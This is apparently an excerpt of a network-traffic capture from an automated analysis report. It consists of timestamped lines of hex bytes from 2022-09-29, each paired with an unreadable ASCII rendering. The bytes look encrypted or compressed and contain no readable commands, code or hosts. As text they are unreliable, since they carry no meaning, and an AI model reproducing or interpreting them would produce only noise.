                                                                                                                                                            2022-09-29 12:44:57 UTC3573INData Raw: 44 0a c3 21 c5 e3 51 a6 65 9f 36 47 69 20 e0 0e ea e8 ae 06 2a a9 e0 4d ca d2 87 ad d6 6c 6d 53 e8 18 cb 36 f1 17 40 93 66 a3 20 7c ef a0 01 2f b3 76 d1 8e 8d 44 6e 9e e9 f0 55 47 15 6c 4d 73 66 dd a6 c5 a1 b8 21 a4 b2 3b ef ed 18 69 fc c7 2f 3b b3 1e e2 c0 37 4a 86 a6 19 21 1c ac bc 83 46 57 a9 d7 c6 f3 e0 c6 44 2e f1 6e 3d 6f ce a1 73 65 32 c5 6c 30 51 f3 b2 0d 27 0d e3 2a a9 16 83 5c 93 29 28 ee 46 1f a2 76 b8 be 41 f7 66 68 18 90 a5 6f f7 b0 0b 6c e1 c1 e1 d9 ad b6 c8 14 cd 90 08 03 5f 08 b2 ed 12 af e3 22 19 74 25 ef dd 7e 0e 1a 0f b2 eb d5 c7 e4 b3 e7 6f 9a be b4 44 c6 28 3f c2 56 f4 7e a8 2e ff 7a a1 7f a3 ed a2 c4 0e b1 33 1b 91 11 64 00 68 66 63 b9 49 72 cc 35 aa 1a 70 1a fe 16 86 29 70 35 79 7c 0a 47 fa e2 02 b4 74 44 9c 80 1d 00 36 71 3e bb db
                                                                                                                                                            Data Ascii: D!Qe6Gi *MlmS6@f |/vDnUGlMsf!;i/;7J!FWD.n=ose2l0Q'*\)(FvAfhol_"t%~oD(?V~.z3dhfcIr5p)p5y|GtD6q>
                                                                                                                                                            2022-09-29 12:44:57 UTC3589INData Raw: 7a 5a 83 de 6c 05 6f 0a 6f 9e 6a 5f 5b 13 fb a6 20 a8 2d af 0f 6e 3a 1f 2a a2 a3 0c 88 63 0d c7 a4 7a b0 ab bc a7 14 00 19 b0 87 76 67 f3 3f 81 81 40 3d b4 9a ff 39 69 68 4b b6 09 1c d4 b2 37 e5 ca 31 25 44 f9 f7 8b 68 91 ba 6a ef dd cd 36 35 c5 2a cb a6 df 5e 3e d4 da cc f6 4d 4d 09 83 66 8e 6f 26 3d d0 ac 15 97 92 c7 62 c1 db 8b 79 a2 a8 ee 33 e8 d1 bf 89 60 f3 f2 69 05 e7 96 7e ca e2 9b e1 06 1b 86 cb 25 32 4a 94 f6 1d 8b ee 77 d6 d9 46 02 cb bf 26 7c fb f2 04 69 d2 87 47 ae f1 51 62 7c 8b 9a 3e 2b ac aa 0e be 51 b2 8b 36 f2 9f 1f 69 94 d0 2f 85 1c b2 79 b0 ff 30 03 f8 64 35 b7 80 c8 76 ce 1c 23 bd 6b b7 a8 92 6d 1e d7 5b 6f 8f 05 20 96 c3 cf 9a 0d e2 d5 6f 53 6f ab ae 05 a5 38 07 57 a6 e3 be c3 11 eb 7b 87 e6 c7 4d 2b 35 e2 e8 fc ff cf f8 90 dd e6 1b
                                                                                                                                                            Data Ascii: zZlooj_[ -n:*czvg?@=9ihK71%Dhj65*^>MMfo&=by3`i~%2JwF&|iGQb|>+Q6i/y0d5v#km[o oSo8W{M+5
                                                                                                                                                            2022-09-29 12:44:57 UTC3605INData Raw: 0b c2 ef 15 1a 99 84 e9 67 86 3c 0e 74 c5 85 fd 77 b5 14 00 28 5a 49 b8 53 81 aa ef e7 91 6b a7 93 18 58 17 23 71 31 0d aa 4d b7 6c c7 48 03 b6 0c 8e d9 e2 c3 36 3a 4c a7 22 21 b7 c1 1f dd 53 2b 4a 3f da 60 4f 33 c6 1f f0 fc 42 4e 34 90 68 80 1a f9 fa 95 9b 85 15 a6 b6 58 e1 58 8f 35 1e de 64 9b 68 8f bd 0f 80 71 a8 2b 79 9a 00 56 5f 04 77 6c ec 1b ef b8 37 8a 18 c2 83 25 16 a1 61 b5 c7 46 3b bc 6c 91 f4 1c 6f c2 bd 3f 57 04 1f e9 cd 88 00 06 9d 81 e3 60 33 92 6f 1f ca 2f 6c e8 89 9f 5b 66 e2 45 4c 55 c7 c9 41 14 71 30 7e ee e3 29 32 06 41 5e 1a fe 0a d2 f8 e1 fc e0 19 5d 66 85 ad cf 52 11 10 f1 1c d0 a7 7b be 40 0a c9 cd 1b 7c c5 a0 c5 80 0b 6a 6a b9 4a c4 21 63 02 49 ef 0b 2a 10 8a 7c 64 3a 26 15 3c 2f 54 54 c9 c9 0e 54 7b f1 5d d3 f8 f1 b5 13 18 bf f4
                                                                                                                                                            Data Ascii: g<tw(ZISkX#q1MlH6:L"!S+J?`O3BN4hXX5dhq+yV_wl7%aF;lo?W`3o/l[fELUAq0~)2A^]fR{@|jjJ!cI*|d:&</TTT{]
                                                                                                                                                            2022-09-29 12:44:57 UTC3621INData Raw: 8e 55 53 41 71 82 44 d1 e4 ff 04 77 aa 8f a9 99 11 cf 3d 6b 00 74 8e 28 6c dc 2d ef d7 49 c2 9c 48 d7 95 52 bf 40 60 af e0 47 c5 93 ac 22 7c cd 04 da ce e5 ae 1a 81 f5 0b 49 62 30 b6 62 5d e1 e5 a1 47 52 95 ad f8 1c 50 e6 5c d1 04 df 2a 1c 6e d7 72 36 b3 38 34 13 e5 df 90 99 fb 7c 84 ab da f3 4b 42 e9 97 96 b0 92 78 14 90 78 a7 90 ac 2a f1 9f 48 e8 31 9f a8 88 c7 9f d3 62 a3 99 07 a1 94 cf a8 19 04 80 3e 8a d2 a5 8b 2c e9 ec e3 a2 18 1a f9 c0 2e 2b de a7 7f 95 f4 dc 11 78 be fe f8 fb 93 75 cf e8 e8 3a 97 dc 7e 5c c6 1e 70 75 78 a9 bd 45 73 c0 04 e2 53 84 a2 27 0e a4 15 7c a8 b9 7f 45 7b 86 45 46 80 f4 78 ef c9 a8 ba 13 2d 1a a8 8b 09 ee 9d 4d b8 c3 c2 85 06 19 c6 30 88 fa 96 02 a2 c7 27 64 ac ab 44 04 17 36 61 3a d1 13 18 45 ae 32 93 b9 06 0f e7 78 88 77
                                                                                                                                                            Data Ascii: USAqDw=kt(l-IHR@`G"|Ib0b]GRP\*nr684|KBxx*H1b>,.+xu:~\puxEsS'|E{EFx-M0'dD6a:E2xw
                                                                                                                                                            2022-09-29 12:44:57 UTC3637INData Raw: 69 a6 2e e7 a4 f4 11 f8 3d ee a6 2c 0d 3c ba fd 6f 42 d8 36 37 58 b1 32 5c 09 d3 26 87 44 d0 7c 05 49 b8 e8 7d b1 b6 0c e1 7a 1b 03 e5 32 61 73 9f 65 e7 43 86 e8 41 6f 78 08 65 23 6f d9 bc 58 ba cb e4 3b d3 b9 cf ca 3c 39 a0 dc 45 f5 79 61 36 64 bc e9 60 30 a8 e2 07 14 05 0c cd a2 ec 1a 75 5d 5a 96 64 81 ca de ab 6b f8 67 f3 34 6a 1c 70 7c 04 6c 57 0f 80 4e 0c 59 fa 8c d8 30 f4 24 8b 6f a3 59 61 29 75 e8 8d 5f 33 6a a1 74 1a 5d bb fc d9 cd f0 6f e5 ff 4f 88 fd 84 6e 4d a8 52 77 86 cc 38 7f a0 13 70 7a 41 5a 17 de 57 24 4e bb 7e ef 84 71 63 a9 fc 07 b5 85 c5 6c a2 f9 b6 8a 26 1f ff c7 ea 49 0d aa ae 56 19 ab 7d 45 8b d5 88 07 43 64 46 d2 d5 78 e5 ef 9b 99 0b 07 84 d5 c5 a1 fb 8a a2 02 05 80 9b c6 18 fd 5c 9f 1e 0f 97 de 54 76 1b 8c 2d 29 ed 1c 1c b7 dd 1a
                                                                                                                                                            Data Ascii: i.=,<oB67X2\&D|I}z2aseCAoxe#oX;<9Eya6d`0u]Zdkg4jp|lWNY0$oYa)u_3jt]oOnMRw8pzAZW$N~qcl&IV}ECdFx\Tv-)
                                                                                                                                                            2022-09-29 12:44:57 UTC3653INData Raw: 5a 1b f9 57 4c 76 68 c7 0f de 73 1c fd 5d 63 99 2a 37 f4 8a 0a 8c 25 bc a4 07 54 a3 45 e7 8c 10 90 45 6f 81 1f b0 80 0f bf cb fb 14 f0 3c 76 74 e4 2c 38 30 fb ea 0e 0a cd f8 cf 5d eb 43 b2 c3 09 8c 99 39 4d 80 1c 42 a9 b0 87 ca 27 b5 dd 56 e4 66 ab 44 9b 41 96 59 fa 10 e4 af 04 05 1c ea 91 f8 6a 3b d0 d5 d8 b6 54 5b f3 7a 9b a7 af 03 c6 e9 15 db 90 23 8a 1c 8e c0 b7 d5 b6 a4 6e 93 ae a1 d2 01 65 88 72 26 5c bf d3 5c 6a 67 75 c2 8c 4d 9f 5b 9d e4 7b 50 aa 6f 71 fc 1c 58 3d 21 d7 01 15 aa 65 74 1a 57 6b 34 6e 7b 84 b7 18 31 9b e4 32 9d 52 1f 96 c9 78 0f 7a 0c ec 09 4e 22 45 ed 88 00 0f f5 ce bd a0 85 a1 9b ed 25 cf 7c f4 91 f5 86 82 9a 80 f2 ea 14 84 82 2f 2f e9 6a 05 36 3e 9d fe fa 3e b5 7c 86 1a de 16 ba 63 f1 33 fb d2 c3 d2 a8 5d f0 5b da 0e 7c 77 d3 b5
                                                                                                                                                            Data Ascii: ZWLvhs]c*7%TEEo<vt,80]C9MB'VfDAYj;T[z#ner&\\jguM[{PoqX=!etWk4n{12RxzN"E%|//j6>>|c3][|w
                                                                                                                                                            2022-09-29 12:44:57 UTC3669INData Raw: 37 7d 48 44 1a 66 d6 8b c6 e9 88 04 b0 b7 7d 5c 27 38 c7 2e ed f9 7c 30 21 c5 42 fc ec 95 50 57 09 2b be 61 4f 79 6c 12 35 57 aa e9 ce 6b 9f bb da a0 57 85 1c 2b 74 38 48 68 88 54 e3 c4 7a 14 95 dd 5a 1c f8 3a 72 f9 9a 76 be cb 48 1a b8 42 92 97 06 de ca 4c e0 d2 20 6c 06 f9 42 60 8d fb 90 17 94 36 af f2 b5 c8 28 fc d9 94 f0 9b 90 d3 ab 0d 93 f4 dd 96 3f 3c 04 2c aa 86 14 66 c5 32 0c d5 f0 d8 c7 ea 2d 75 af 8a f4 cc 55 d7 88 34 58 67 6e 23 b3 a6 51 68 63 0b 0e 5c df 4f e8 70 a5 5d 0b 87 7f ed 87 97 b0 22 fa 7d d9 87 70 7e 32 0a 88 8e 08 1c e3 0f 26 51 0f f5 de e8 95 88 a8 7b fb b9 0a 90 d3 e3 b6 32 e0 96 15 1f 72 da df 4b 23 6a 6a ba a9 a1 7c 86 e6 1b 0c 8e f1 16 f1 2b 46 fd 7e b3 c1 4b b0 11 af 6a 27 45 e4 68 f0 fe 3e 90 d9 c5 e2 bc 6e 7b 49 01 6c 4b 4b
                                                                                                                                                            Data Ascii: 7}HDf}\'8.|0!BPW+aOyl5WkW+t8HhTzZ:rvHBL lB`6(?<,f2-uU4Xgn#Qhc\Op]"}p~2&Q{2rK#jj|+F~Kj'Eh>n{IlKK
                                                                                                                                                            2022-09-29 12:44:57 UTC3685INData Raw: 32 5d d3 7b 90 43 c4 9b fe 6f 06 71 b1 63 bd 96 c6 a3 39 7a db e0 16 81 02 3d 19 f7 d6 1e d8 a7 d2 db 0f fb 38 fa ed ed 1f 09 20 78 19 38 b9 e0 70 c2 b9 99 86 62 8a 62 66 a7 be 8b 6d c1 6d 13 d8 9c 0f e0 ff 38 40 27 4d e4 6e 8e 0f a0 f1 1b 54 f3 fa f5 72 a3 4f 58 49 88 de 82 2a af a5 80 81 e1 04 0f fd 6a 3f f7 77 83 64 89 f2 b9 78 d9 7d c1 f1 df 57 ca c2 08 e3 e2 ff 3b 75 7e f2 80 ff 37 bb d0 f4 e9 e1 9c ce c8 61 ee 75 7d b8 38 75 ab cd f5 b2 63 13 99 f1 de 59 95 8f e9 6c 0c f5 50 db 22 b2 00 b8 85 67 63 b0 31 16 e3 54 4b 33 17 e0 2b 4b 46 b6 a3 14 a7 53 70 38 52 14 47 c4 b0 d2 a1 85 d1 56 ed e8 1a c1 23 11 d2 28 9a 97 6a cd f4 f4 07 05 6d bc c9 ef 82 33 c9 65 d2 0c 1e e1 ea ed 7e a0 f2 3d 2e 16 1f 05 9d a0 c3 94 a1 3c 32 8f f0 4c 10 b7 5f 76 50 a9 c6 3f
                                                                                                                                                            Data Ascii: 2]{Coqc9z=8 x8pbbfmm8@'MnTrOXI*j?wdx}W;u~7au}8ucYlP"gc1TK3+KFSp8RGV#(jm3e~=.<2L_vP?
                                                                                                                                                            2022-09-29 12:44:57 UTC3701INData Raw: 94 33 7e 01 72 5f 62 b9 e1 c9 68 6e a1 a1 bb da c3 3d 6a 84 e5 01 8b 57 8a 71 d3 28 f0 c3 2c d3 70 79 c9 4f d4 66 64 15 e8 2c 52 77 b1 51 e5 73 56 76 4a 07 f6 19 43 1c 7b b3 ed 87 14 e0 47 49 38 5e 98 54 00 9e b2 3c aa bd 1e 59 91 5c f3 6e c3 ec 0b c8 47 16 fd a7 f5 60 27 a9 a3 02 14 c0 5c 25 6f fc ee e1 56 4e 46 28 bb 5c 5d 73 74 79 09 05 3e 39 8c 2d c7 b6 b8 ac 2c b1 b7 d6 dd 3f 86 37 e3 b0 4e 41 c9 41 0f 36 ac 8e bc 45 c5 00 79 61 e9 98 77 fc cd fb f1 8b b4 fb 99 ba 0b e5 40 ab c8 d5 f5 3a 28 45 ba dd ea 76 55 ba e1 d0 8e 0b 09 e6 6c 7c c1 4d 3e f7 f0 2f ce 7b 72 84 71 e8 b8 4f 13 3b 20 ba 60 cd 75 40 e4 2a 1c 42 05 fa b9 b5 4f 48 4f 25 6a 0e 47 8c e9 24 69 9d ea 0d ef 13 d7 a5 85 4b 33 74 46 62 cd ff 2c 78 f4 56 f7 fb c5 c8 11 25 86 a1 5f f7 1e 5e 2b
                                                                                                                                                            Data Ascii: 3~r_bhn=jWq(,pyOfd,RwQsVvJC{GI8^T<Y\nG`'\%oVNF(\]sty>9-,?7NAA6Eyaw@:(EvUl|M>/{rqO; `u@*BOHO%jG$iK3tFb,xV%_^+
                                                                                                                                                            2022-09-29 12:44:57 UTC3717INData Raw: d8 6d c1 95 70 9e 5f c1 18 ee de 46 cb a2 13 4e 43 f0 f2 ae fb 63 c7 6e df 41 48 bc db d7 74 45 b9 f9 15 ca a7 15 ca eb 68 c7 5b a4 c0 3a 5a ce f0 4e 95 de de 38 3c bc 38 78 02 89 1b 99 11 81 75 c7 23 70 17 6d eb 45 9d b7 93 73 53 a6 b6 ae 63 86 e1 a0 87 b0 7d b6 11 b3 b2 3d 1e bd b2 6d 65 59 14 e6 c9 83 ed c9 05 e0 d5 4e 2a 34 dd e3 f8 55 ed b2 31 6f 58 56 a4 b9 fc 4f 63 db db fb 97 8b a9 b2 c5 99 69 b6 94 52 9f 17 f1 99 db a9 b3 91 4e 1f 99 ee 98 e9 e9 bb 83 68 8f 1f e6 05 a0 40 c3 d8 33 65 ee 2f cb ea 6b b3 ce b6 19 f0 39 e2 c0 80 b4 52 29 1b c6 85 a6 87 a5 b4 47 1b ac 9c 96 66 ef ca 9e b1 70 c9 54 2f f5 29 54 7c 7a 56 ad ee bf ae e3 6f 91 48 0b 09 21 4a 41 89 bf d8 5f c3 92 b4 44 e1 68 9e 25 19 c6 e0 b5 75 48 4c 66 59 e6 c4 91 5d c4 69 45 02 36 cb 1a
                                                                                                                                                            Data Ascii: mp_FNCcnAHtEh[:ZN8<8xu#pmEsSc}=meYN*4U1oXVOciRNh@3e/k9R)GfpT/)T|zVoH!JA_Dh%uHLfY]iE6
                                                                                                                                                            2022-09-29 12:44:57 UTC3733INData Raw: 67 4a a1 4b f8 3f 2d 30 64 b4 09 0a 93 e9 7b 8e 3a e2 d3 60 8f e7 78 99 f4 4a 0c 7c cc ce ee 09 24 83 53 78 ba 47 8b 34 bd 2c ba 4b b8 d7 65 63 8c 73 5d bf f7 e2 0a 67 dc a6 4d 41 ef 26 a1 92 ef aa 96 2d c2 ff 99 a8 e3 c7 d6 12 75 ff 88 af b6 6b 2c d0 c5 57 74 33 f8 9a 13 4d bc c8 7b ec d1 de 68 e9 69 f5 dc 3c 46 28 e7 9c e5 44 86 12 fb 88 8b a1 9a 27 fd 47 7c 9d f5 5c d0 3a dc 43 48 13 45 2f c9 a1 d2 f1 ee cc c3 a4 c3 f7 5e 43 a0 70 41 42 47 6e 37 a3 3c 42 c7 33 be 9f d3 95 9b a6 36 4f 29 30 1e 9f a7 7c 18 9a b5 b0 43 b9 f9 93 02 11 ad d7 ca 0e 78 91 59 47 62 b4 6d b4 a6 a5 1e f7 e1 d1 34 86 1e 05 81 cf ca 9b 9b 20 5b 05 5f b8 d2 3f 38 ad be b0 e4 43 bf ef a5 66 1a a6 6a a7 34 73 18 84 9d 4e 6d e5 68 11 1b b6 ae 02 ad 58 60 13 ac 11 43 7a f4 50 66 6e fe
                                                                                                                                                            Data Ascii: gJK?-0d{:`xJ|$SxG4,Kecs]gMA&-uk,Wt3M{hi<F(D'G|\:CHE/^CpABGn7<B36O)0|CxYGbm4 [_?8Cfj4sNmhX`CzPfn
                                                                                                                                                            2022-09-29 12:44:57 UTC3749INData Raw: 45 1a 73 2d 8f c3 fe bb 9e 1f be 45 28 02 83 74 88 6c 19 d4 06 8e 47 4f 8e 9b bc 0c 23 87 de bf ac f6 18 af 9b a8 4c b7 3e 7e 9e d0 44 cb f9 ac a0 9e ad d0 f4 63 ad 37 65 ef 72 d4 33 42 79 44 92 f9 1b 94 99 a3 e4 4c d2 5e 9c ed 75 87 33 63 6f a9 27 17 95 3c 37 dc fc ca 92 4a ee f7 a4 f7 b1 f5 80 3f c0 20 69 8a 8b 52 28 bc 54 59 8a 93 da 0d cb de 1a e1 28 56 2d fc c4 e5 52 ce e2 f2 c2 71 96 a8 d9 49 b6 17 73 6e a1 23 b4 c0 59 62 ed 22 b5 18 ea 4f a6 66 ff a9 75 de a2 40 07 68 63 d8 70 2c a1 a6 52 18 3a ef bd aa 12 56 27 81 fb ad 31 41 d6 1b e1 18 b4 0f cb d1 35 45 e6 b5 2e ab df 81 c7 55 f4 e6 b8 85 0a a1 9c 79 84 c6 9a 36 71 6e 50 e1 60 f8 9a be 6c a2 77 24 dc da 23 ee 53 41 17 a4 1d a8 23 5a c4 4c 71 53 54 ee 0e f7 7b 2a a1 f8 9b 0b 40 cc 27 69 5e 3c 02
                                                                                                                                                            Data Ascii: Es-E(tlGO#L>~Dc7er3ByDL^u3co'<7J? iR(TY(V-RqIsn#Yb"Ofu@hcp,R:V'1A5E.Uy6qnP`lw$#SA#ZLqST{*@'i^<
                                                                                                                                                            2022-09-29 12:44:57 UTC3765INData Raw: 41 64 88 c7 b7 d8 6d 4b a0 bc 7a 04 30 b4 f5 89 ba 8c 00 50 50 35 29 25 9e 06 e2 8f 3f 22 e1 14 5a a0 a3 d0 30 c8 b7 2f e5 06 0d 9c 23 44 e4 88 c5 31 43 ed 04 68 ac d5 c4 93 12 94 c4 81 c0 93 0d 3b 6e 2d 3f ad 91 55 0e 5a 99 81 cd 80 eb 9e 53 25 23 61 e0 e0 49 45 3a 83 4f eb 2f d9 3b e3 f0 26 3f 88 c1 71 f6 54 f1 93 dd 90 d8 cd 49 ca e9 3f ef b0 87 0a 3a dd a6 25 cf 76 66 b2 35 80 d6 f2 86 4f 27 ef 33 83 5c 24 35 a1 e8 49 99 1c e8 ec 2b d9 60 a5 e2 4a a1 40 e6 49 23 5f f7 b0 bb 59 77 a2 da 7e 3d b2 b5 b3 33 cc 75 b0 4d 0e 68 de 29 04 6c db 1c 00 0a 16 d5 7b 56 61 10 7a 30 08 e6 ac ac ab 0f 7a e1 64 65 34 c2 ed 83 b1 df 5d ea ee 64 48 9b f1 74 92 b1 7f 28 c6 9c 03 ab 73 49 4d 10 06 07 d3 8e 2f fb f5 e9 32 6e 73 3c 09 0f 63 01 f5 98 53 25 8a 00 4a fe 0c c9
                                                                                                                                                            Data Ascii: AdmKz0PP5)%?"Z0/#D1Ch;n-?UZS%#aIE:O/;&?qTI?:%vf5O'3\$5I+`J@I#_Yw~=3uMh)l{Vaz0zde4]dHt(sIM/2ns<cS%J
                                                                                                                                                            2022-09-29 12:44:57 UTC3781INData Raw: 10 99 16 cd 78 ca 98 71 1c 35 c4 33 84 f2 c9 fc 40 dc a7 2a fc 8e f2 4a d3 15 01 74 0c 9f fc 63 3b 1a fe 8f 10 17 ad af 47 2a d0 0a 1d 25 03 b5 45 6d 1a 5e 27 fa a1 51 dd b0 bf 2f 45 2c ea 01 3f 27 8e 3a d6 84 d9 57 4c 84 c7 f5 6b 23 e9 e4 9f a9 22 59 4c 42 0f 86 a9 27 65 2d 52 ef b5 8a d9 cc bb c2 8f 7c b3 b1 30 a8 93 3a a2 d5 20 71 ad 91 c5 ab d9 be 6b 36 16 af 7d fd fd b5 14 1b 2d 9b c1 d0 1c d7 9d e8 c7 1d af f3 4b 1e 16 df 6b 65 84 55 19 c6 c6 2a 10 fc f4 08 00 20 b5 95 79 49 4f 4b e1 fb 82 5e 83 ba 9d 41 3d b2 49 b7 49 f9 a1 1a 98 72 f7 56 d1 ee f7 9c 94 cf 07 e1 fc 4b 7f c5 f1 d8 21 20 6f 43 b2 16 77 fd d0 fa 7a 68 1a cf d1 99 76 25 87 af c0 1d 70 e7 b0 c4 b7 a9 52 2f 84 0c a9 58 64 00 99 a2 b0 41 03 94 8c 9d c1 ed 7c b4 91 33 e4 3f ee 2a c4 34 a8
                                                                                                                                                            Data Ascii: xq53@*Jtc;G*%Em^'Q/E,?':WLk#"YLB'e-R|0: qk6}-KkeU* yIOK^A=IIrVK! oCwzhv%pR/XdA|3?*4
                                                                                                                                                            2022-09-29 12:44:57 UTC3797INData Raw: fd 7a b7 ed 49 27 bf c2 8d 2d 00 76 c8 68 13 ef ca a1 83 fb 09 24 1a 9d 3d 50 d4 f5 68 1f 5d 22 9e 51 7a b0 9e f3 da db 79 28 fc 47 4c 1e a8 0d d8 91 82 e9 c3 3a c5 6c d8 69 cb 78 40 0c bb 3e 7a fa 96 d4 05 82 7c 94 20 cc 57 00 cc fc 66 a9 9e 25 3b 7f 40 28 df f3 14 ac d2 f8 1a 2e c1 fa d5 99 f9 82 a7 af 6f a4 b7 52 d8 f0 7e ee 1b 41 a3 ac 85 71 70 71 c5 db ac 2a b0 2d a6 65 30 87 42 3a 49 0b eb 7d 5b ed 0a cc 45 f1 ae 9a d2 46 51 af 67 78 52 6d e7 d2 6e 11 3b 56 1c e3 16 19 74 5f f3 0f 49 48 10 55 34 ab 80 1b 12 26 9b ca 07 38 df 06 7a e0 59 b3 b7 47 79 71 ef 46 c6 14 10 e6 98 80 f6 02 26 b4 53 45 f7 04 02 4a c2 bd 89 b0 1d 4c 52 99 48 78 a2 02 5f 89 de fb 73 77 f6 84 b9 b9 2e a7 b8 08 f7 82 c5 81 24 91 7e 75 05 54 49 d7 10 99 e4 60 e8 c9 49 ed 10 d5 94
                                                                                                                                                            Data Ascii: zI'-vh$=Ph]"Qzy(GL:lix@>z| Wf%;@(.oR~Aqpq*-e0B:I}[EFQgxRmn;Vt_IHU4&8zYGyqF&SEJLRHx_sw.$~uTI`I
                                                                                                                                                            2022-09-29 12:44:57 UTC3813INData Raw: 44 48 17 0b 3e 57 71 8c 7e ee 8f 65 d3 1c 51 47 bf 46 22 fa d8 bd 60 29 30 65 b0 76 93 42 37 f2 3f 00 51 84 1f fe d7 bb 88 32 82 45 a8 95 b7 00 2c 03 79 46 cb a7 0c 8b 74 1c bc 8f dd b2 f7 87 a4 e0 f4 55 ae 17 16 0b 0b b0 f3 40 a3 fc 9f a4 b6 4e 6f 5b a5 3f fc 89 d3 e7 ea 5e d4 75 52 23 50 20 46 67 0e 48 87 a2 77 7d 35 70 bc 79 3f 78 cd 2e 1f 88 96 de 1b ef 54 01 93 30 32 8d 94 7c 6e 0f f7 51 95 4d 76 4a 8c 6b 8f 69 09 23 95 af 0c 2a 60 67 aa 7f 60 9f 0c 63 fb 1b 8d e6 b7 e0 5d 6b 29 9f ec a4 b1 85 f5 54 f2 d4 2b 98 1c cd 49 f1 40 cf bf 09 ad 56 f6 68 9b ed 62 65 18 ed 20 51 48 55 42 a9 df f1 fd 1b 0a 32 5e 2d 27 75 cc ea 66 d1 ab 8f 94 4f 3e 27 46 92 8c fa 0e 47 1b 91 90 10 f6 f6 17 44 ba 92 9c 5a 85 77 e8 4b 32 64 33 eb ad 54 56 dd 4e 14 8c 14 4c 8a ec
                                                                                                                                                            Data Ascii: DH>Wq~eQGF"`)0evB7?Q2E,yFtU@No[?^uR#P FgHw}5py?x.T02|nQMvJki#*`g`c]k)T+I@Vhbe QHUB2^-'ufO>'FGDZwK2d3TVNL
                                                                                                                                                            2022-09-29 12:44:57 UTC3829INData Raw: 51 75 90 6e 2f f5 f6 7b e6 09 a4 8d fe 2c f8 dd 1c 04 10 be e3 5d a0 14 69 0f 0f 87 84 9f 8a 54 db 59 be 2d c0 9b 4d 76 df 40 9c 9f 01 af 56 ec 56 a2 37 fe 2f 40 74 d3 5b b5 88 df 3e a8 63 92 88 18 37 51 fb c2 42 10 95 3e ac b7 24 3c 61 41 59 49 16 62 10 a8 b7 33 fb c5 1e b1 05 c2 ad b0 5d 54 2b f3 91 a2 6d 62 04 3f e1 e1 40 60 aa 72 be 9d 6c 9d 97 e7 e2 38 0f 14 19 d4 6c 1d 9d 93 64 29 24 ec cf 1f b2 db a1 3e 44 30 d2 31 21 ae e0 69 d6 24 65 b5 2b f9 bb bc aa 2a c1 f2 3e 56 45 78 bd 04 4a 4a c3 db 5f 98 7d 30 13 b7 78 f8 8f 39 44 2d 6d 29 fa e8 4f 32 5e 2f 07 c4 c1 e9 63 48 d9 a0 5b 38 dd 19 87 5c 73 f4 de 15 83 65 3c 29 93 8f 98 4f 41 b1 f6 a2 bb a7 33 ba fc 85 d9 01 03 f2 45 ca d9 e3 60 e8 a2 82 78 95 bf a8 8d 5d cd a0 0e ab da b4 ac 0b 61 b4 39 02 00
                                                                                                                                                            Data Ascii: Qun/{,]iTY-Mv@VV7/@t[>c7QB>$<aAYIb3]T+mb?@`rl8ld)$>D01!i$e+*>VExJJ_}0x9D-m)O2^/cH[8\se<)OA3E`x]a9
                                                                                                                                                            2022-09-29 12:44:57 UTC3845INData Raw: 7b 5b 3a d5 44 0e 85 d8 41 33 7a dd c7 a8 00 d7 c2 3f eb 41 da c6 a9 9a af e0 e0 92 47 10 72 de d8 0e d2 59 a8 94 10 7b ac 9a 12 bd 6b c8 e6 9e a5 13 db 4d 2d 09 43 64 fb 44 e1 0a 9a 0a 1e 97 da e5 5d b7 a4 73 68 94 c5 a7 2f 47 61 2f 31 e6 77 b1 bd 3e 3f c5 e8 ba 01 8d 10 e2 a4 c5 e4 f4 f1 16 f9 d1 36 d4 5e 5c 48 ff 61 04 06 50 b4 da ac c5 3b aa 23 55 25 45 a6 1c 5a d2 de 29 d6 f5 0e 47 4d 21 33 e1 0c 20 6b af 67 f4 87 67 6f bb 4a 84 2d 97 d3 ae 19 65 11 40 83 c6 d0 1d 1a ae 0c 63 02 cb d1 42 9b 92 52 40 7d e7 02 ef a7 10 ff a4 f0 ee 14 7e 50 9f e5 81 ff 71 32 a8 f7 16 12 f4 cf 8b 5f a0 e1 92 9f b9 ed 36 3e da f9 49 41 68 e8 fb 66 d3 a4 11 5c 22 37 73 df 48 52 28 c9 95 97 2a ee f3 30 1c f7 4f f4 94 1f b1 0e 28 c5 1f aa af 09 17 eb de bf a1 56 ec 91 d8 3d
                                                                                                                                                            Data Ascii: {[:DA3z?AGrY{kM-CdD]sh/Ga/1w>?6^\HaP;#U%EZ)GM!3 kggoJ-e@cBR@}~Pq2_6>IAhf\"7sHR(*0O(V=
                                                                                                                                                            2022-09-29 12:44:57 UTC3861INData Raw: f5 50 cc e1 8b 4b 0a 11 cc 43 70 7f 35 81 4a 5b 99 e4 7b 34 31 73 c8 f7 01 16 37 6f 21 30 c4 94 95 0d 73 fb 34 55 6d 80 2f 8c 0c f5 f8 cc ac 6b 38 e5 fc ef 0e a1 43 cb cd ad 15 a7 40 4e d8 e4 ae 05 ab f9 06 8c d1 3c e9 9f 5d 6d 26 1d c3 0a df 67 5c 86 f9 56 71 32 49 03 3b 04 1c 3e 24 ec 30 65 f3 d5 6c 74 bd d4 86 8c fd 56 82 28 83 7d 50 e3 34 1c 22 3b fd d4 ba 02 df 83 3e 07 e4 a0 4f db 49 77 57 1d 94 33 fa 97 96 83 21 19 11 d8 55 a6 c0 97 6b dc d6 21 f2 8d 19 fa 41 81 ca 81 79 ae 23 30 05 24 06 7e 03 f7 b4 80 0b 37 37 98 2c 82 c7 70 75 01 02 b5 f1 1a 7e b5 90 fe fc 23 6b 81 bf 2b b4 1a 54 1f 90 86 db f4 85 ff 33 95 b0 db 96 75 16 d8 d4 1d d6 fe a5 42 ed 57 98 5d 12 bc f1 cf 44 fc 7b c7 18 0d 04 e1 a7 44 d3 ca a9 2a b4 bf 9c 21 78 5c 87 38 cd c7 7c a3 9a
                                                                                                                                                            Data Ascii: PKCp5J[{41s7o!0s4Um/k8C@N<]m&g\Vq2I;>$0eltV(}P4";>OIwW3!Uk!Ay#0$~77,pu~#k+T3uBW]D{D*!x\8|
